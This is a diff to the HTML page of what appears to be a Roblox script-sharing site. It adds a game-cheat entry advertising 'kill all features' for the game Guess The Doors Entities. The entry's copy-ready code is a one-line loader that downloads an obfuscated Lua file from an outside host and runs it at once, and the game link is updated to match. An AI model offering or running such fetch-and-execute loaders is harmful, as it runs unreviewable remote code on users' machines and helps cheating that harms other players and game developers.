--- a/index.html
+++ b/index.html
@@ -319,14 +319,14 @@
 
 
 <div class="script-item new-style">
-    <div class="script-header">g</div>
-    <div class="subheader">A brief description of what this script does.</div>
-    <div class="script-code">print("g")
+    <div class="script-header">Guess The Doors Entities 👁️</div>
+    <div class="subheader">A GUI with kill all features. Might patch soon!</div>
+    <div class="script-code">loadstring(game:HttpGet("https://getorbs.us.to/GTDE-obfuscated.lua"))()
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
         <!-- Optional: Add a button to join the game -->
-        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/123456789/My-New-Game')">Game link</button>
+        <button class="join-game-button new-style" onclick="joinGame('https://www.roblox.com/games/114782592631094/Guess-The-Doors-Entities')">Game link</button>
     </div>
 </div>
 
